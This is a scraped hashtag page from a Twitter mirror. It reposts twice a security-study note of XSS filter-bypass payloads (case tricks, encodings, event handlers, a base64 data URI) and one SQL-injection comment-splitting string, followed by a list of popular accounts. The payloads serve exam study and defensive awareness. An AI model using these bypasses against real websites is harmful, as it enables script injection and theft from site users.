Top Tweets for #prepending
Daily Notes : Day 78
REGEX BYPASSES
<sCrIpT>alert(XSS)</sCriPt>
#changing the case of the tag
<<script>alert(XSS)</script>
#prepending an additional "<"
<script>alert(XSS) //
#removing the closing tag
<script>alert`XSS`</script>
#using backticks instead of parenetheses
java%0ascript:alert(1)
#using encoded newline characters
<iframe src=https://t.co/LaGQY3SUwo <
#double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE>
#uncommon tags
<img/src=1/onerror=alert(0)>
#bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a>
#extra characters
Function("ale"+"rt(1)")();
#using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176
#octal encoding
<iframe src="javascript:alert(`xss`)">
#unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3--
#using comments in SQL query to break up statement
new Function`alt\`6\``;
#using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
#base64 encoding the javascript
%26%2397;lert(1)
#using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)">
#Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>
#use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
Credit: @h4x0r_fr34k
Daily Notes : Day 78
REGEX BYPASSES
<sCrIpT>alert(XSS)</sCriPt>
#changing the case of the tag
<<script>alert(XSS)</script>
#prepending an additional "<"
<script>alert(XSS) //
#removing the closing tag
<script>alert`XSS`</script>
#using backticks instead of parenetheses
java%0ascript:alert(1)
#using encoded newline characters
<iframe src=https://t.co/8zitIlda5z <
#double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE>
#uncommon tags
<img/src=1/onerror=alert(0)>
#bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a>
#extra characters
Function("ale"+"rt(1)")();
#using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176
#octal encoding
<iframe src="javascript:alert(`xss`)">
#unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3--
#using comments in SQL query to break up statement
new Function`alt\`6\``;
#using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
#base64 encoding the javascript
%26%2397;lert(1)
#using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)">
#Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>
#use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
References: https://t.co/THqZ8qa2YC
if you're on the internet...you're not safe -----> https://t.co/lZO4AHRJNF
#freesecurityplus #sy0601 @CompTIA #wateringholes #prepending #typosquatting

Last Seen Hashtags on Sotwe
Most Popular Users

Elon Musk 
@elonmusk
241.2M followers

Barack Obama 
@barackobama
119.1M followers

Cristiano Ronaldo 
@cristiano
112.7M followers

Donald J. Trump 
@realdonaldtrump
111.8M followers

Narendra Modi 
@narendramodi
107.1M followers

Rihanna 
@rihanna
98.2M followers

NASA 
@nasa
92.2M followers

Justin Bieber 
@justinbieber
91.4M followers

KATY PERRY 
@katyperry
88.9M followers

Taylor Swift 
@taylorswift13
82.8M followers

Lady Gaga 
@ladygaga
74.3M followers

Virat Kohli 
@imvkohli
71.8M followers

Kim Kardashian 
@kimkardashian
70.4M followers

YouTube 
@youtube
68.8M followers

Neymar Jr 
@neymarjr
64.7M followers

Bill Gates 
@billgates
64.6M followers

The Ellen Show
@theellenshow
62.4M followers

Selena Gomez 
@selenagomez
62M followers

CNN 
@cnn
61.8M followers

X 
@x
60.8M followers


